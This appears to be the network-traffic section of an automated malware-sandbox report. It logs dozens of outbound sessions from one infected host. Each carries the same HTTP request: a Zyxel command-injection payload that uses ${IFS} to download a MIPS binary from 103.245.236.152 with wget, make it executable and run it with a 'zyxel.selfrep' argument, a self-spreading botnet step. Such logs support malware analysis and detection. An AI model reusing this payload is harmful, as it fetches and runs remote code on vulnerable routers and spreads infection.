                                      Jan 14, 2024 15:50:40.145052910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2773192.168.2.1455742145.115.138.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.145073891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2774192.168.2.145423891.13.236.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.145113945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2775192.168.2.144031417.192.191.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.145174980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2776192.168.2.143978866.44.231.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.145226955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2777192.168.2.1451974216.212.43.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.145250082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2778192.168.2.145839843.191.33.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.145266056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2779192.168.2.1438646208.203.182.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.145329952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2780192.168.2.1450996121.16.26.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.145360947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2781192.168.2.143758471.21.30.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.145394087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2782192.168.2.1447800212.64.177.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.145462990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2783192.168.2.145214246.91.110.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.145488977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2784192.168.2.1443858166.65.207.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.145513058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2785192.168.2.145523447.211.77.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.145571947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2786192.168.2.1448468182.149.73.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.145601988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2787192.168.2.1454378109.120.165.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.145631075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2788192.168.2.145505897.150.255.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.145667076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2789192.168.2.1434610145.218.222.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.145711899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2790192.168.2.144088417.152.49.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.145735979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2791192.168.2.143947037.131.80.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.145775080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2792192.168.2.1437182138.85.110.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.145801067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2793192.168.2.1433540201.18.88.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.145853043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2794192.168.2.1442118141.214.84.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.145878077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2795192.168.2.1454364211.218.212.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.145932913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2796192.168.2.144985871.19.157.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.145982027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2797192.168.2.145095691.217.145.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.146039963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2798192.168.2.1440406129.26.86.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.146064043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2799192.168.2.145333053.25.197.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.146100044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2800192.168.2.1439112218.175.161.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.146127939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2801192.168.2.1457980163.70.22.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.146176100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2802192.168.2.143692081.45.163.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.146215916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2803192.168.2.1455144147.165.144.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.146266937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2804192.168.2.143964282.91.55.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.146317005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2805192.168.2.1444956211.168.67.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.146342039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2806192.168.2.1449386207.57.251.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.146393061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2807192.168.2.143949814.19.244.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.146430969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2808192.168.2.14525701.76.180.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.146491051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2809192.168.2.143760291.205.198.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.146512032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2810192.168.2.144839089.209.138.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.146541119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2811192.168.2.1433032100.209.229.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.146600962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2812192.168.2.1435484117.126.139.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.146642923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2813192.168.2.143977071.49.25.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.146673918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2814192.168.2.1441744106.50.139.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.146722078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2815192.168.2.1446636100.167.160.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.146761894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2816192.168.2.1457856208.40.183.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.146811008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2817192.168.2.145483650.60.253.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.146840096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2818192.168.2.1447346158.241.163.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.146872044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2819192.168.2.1456946146.10.63.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.146918058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2820192.168.2.1448166209.130.90.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.146970987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2821192.168.2.1443150192.134.57.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.146991968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2822192.168.2.1445750151.65.2.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.147037983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2823192.168.2.1442236156.59.30.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.147075891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2824192.168.2.145106671.176.33.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.147110939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2825192.168.2.146037069.98.90.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.147142887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2826192.168.2.1448886195.143.226.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.147182941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2827192.168.2.145133288.106.133.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.147233009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2828192.168.2.1444270171.13.90.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.147264957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2829192.168.2.144197234.117.191.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.147319078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2830192.168.2.1459732120.47.211.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.147345066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2831192.168.2.1453286109.120.241.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.147397041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2832192.168.2.144102653.206.77.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.147428036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2833192.168.2.144613425.100.218.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.147485971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2834192.168.2.145458214.204.234.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.147502899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2835192.168.2.1457304112.80.199.111443
                                      TimestampBytes transferredDirectionData
